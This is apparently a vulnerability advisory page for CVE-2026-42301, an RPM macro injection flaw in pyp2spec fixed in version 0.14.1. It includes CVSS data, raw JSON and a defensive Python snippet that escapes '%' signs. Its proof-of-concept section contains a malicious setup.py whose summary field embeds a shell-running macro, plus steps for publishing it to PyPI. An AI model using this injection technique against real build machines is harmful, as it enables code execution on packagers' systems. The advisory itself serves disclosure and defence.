Security Vulnerability Report
CVE-2026-42301 CVSS 7.8 HIGH

CVE-2026-42301

Published: 2026-05-09 04:16:26
Last Modified: 2026-05-09 04:16:26

Description

pyp2spec generates working Fedora RPM spec files for Python projects. Prior to version 0.14.1, pyp2spec wrote PyPI package metadata (e.g. the summary field) into the generated spec file without escaping RPM macro directives. When a packager then runs rpmbuild, those directives are evaluated, so a malicious package can execute arbitrary commands on the build machine. This issue has been patched in version 0.14.1.
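The defensive side of this issue, as an added example that is not pyp2spec's own code: PyPI metadata is untrusted input, and a literal percent sign in an RPM spec file must be written as `%%` or rpmbuild will try to expand whatever follows it. The snippet below flags macro-like sequences in a constructed metadata sample and shows the Summary line as the vulnerable code path would have emitted it next to the escaped form. The metadata dictionary, the `%{name}` marker and the function names are all assumptions made for the illustration.

```python
import re

# Constructed sample of the kind of metadata pyp2spec copies into a spec
# file (not a real PyPI package). The summary contains a %-sequence that
# rpmbuild would expand as a macro if it were written unescaped.
SAMPLE_METADATA = {
    "name": "example_pkg",
    "version": "1.0.0",
    "summary": "Useful library, 100% pure Python %{name} edition",
}

# Anything rpm would treat as a macro invocation: %{...}, %(...) or %word.
MACRO_LIKE = re.compile(r"%(?:\{[^}]*\}|\([^)]*\)|[A-Za-z_]\w*)")


def find_macro_like_sequences(text: str) -> list:
    """Return the substrings of untrusted metadata that rpm would expand.

    This is a review aid for packagers, not the fix: a '%' followed by a
    space (as in '100% pure') is left alone here but is still escaped below.
    """
    return MACRO_LIKE.findall(text)


def escape_rpm_macros(text: str) -> str:
    """Escape every '%' as '%%' so rpmbuild emits it literally.

    Escaping all percent signs rather than only the macro-looking ones is the
    safe choice: rpm's macro parser is the only authority on what expands.
    """
    return text.replace("%", "%%")


def render_summary_line(metadata: dict, escape: bool = True) -> str:
    """Build the 'Summary:' spec line; escape=False reproduces the flaw."""
    summary = metadata["summary"]
    if escape:
        summary = escape_rpm_macros(summary)
    return f"Summary:        {summary}"


if __name__ == "__main__":
    suspicious = find_macro_like_sequences(SAMPLE_METADATA["summary"])
    print("macro-like sequences in metadata:", suspicious)
    print("unescaped:", render_summary_line(SAMPLE_METADATA, escape=False))
    print("escaped:  ", render_summary_line(SAMPLE_METADATA))
```

Running the unescaped line through `rpm --eval` on a build host would show the `%{name}` token being replaced, which is exactly the behaviour a generated spec file must never exhibit for text that originated on PyPI.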

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data available.

Affected versions: pyp2spec < 0.14.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept - Malicious setup.py
# Attacker creates a Python package with the following setup.py
from setuptools import setup

setup(
    name="evil_package",
    version="1.0.0",
    # Injecting RPM macro payload into the summary field
    # This macro executes a shell command when rpmbuild processes the spec
    summary="Useful library %{sh:touch /tmp/pwned_by_cve}",
    description="This package looks normal but contains a payload.",
    author="Attacker",
)

# Steps to reproduce:
# 1. Attacker uploads this package to PyPI.
# 2. Victim runs: pyp2spec evil_package
# 3. Victim runs: rpmbuild -bb evil_package.spec
# 4. Command 'touch /tmp/pwned_by_cve' is executed on the build machine.

References

https://github.com/befeleme/pyp2spec/releases/tag/v0.14.1
https://github.com/befeleme/pyp2spec/security/advisories/GHSA-r35x-v8p8-xvhw

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-42301",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-09T04:16:25.923",
    "lastModified": "2026-05-09T04:16:25.923",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "pyp2spec generates working Fedora RPM spec file for Python projects. Prior to version 0.14.1, pyp2spec was writing PyPI package metadata (e.g. the summary field) into the generated spec file without escaping RPM macro directives. When a packager then runs rpmbuild, those directives get evaluated, so a malicious package can execute arbitrary commands on the build machine. This issue has been patched in version 0.14.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-20"},
          {"lang": "en", "value": "CWE-94"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/befeleme/pyp2spec/releases/tag/v0.14.1", "source": "[email protected]"},
      {"url": "https://github.com/befeleme/pyp2spec/security/advisories/GHSA-r35x-v8p8-xvhw", "source": "[email protected]"}
    ]
  }
}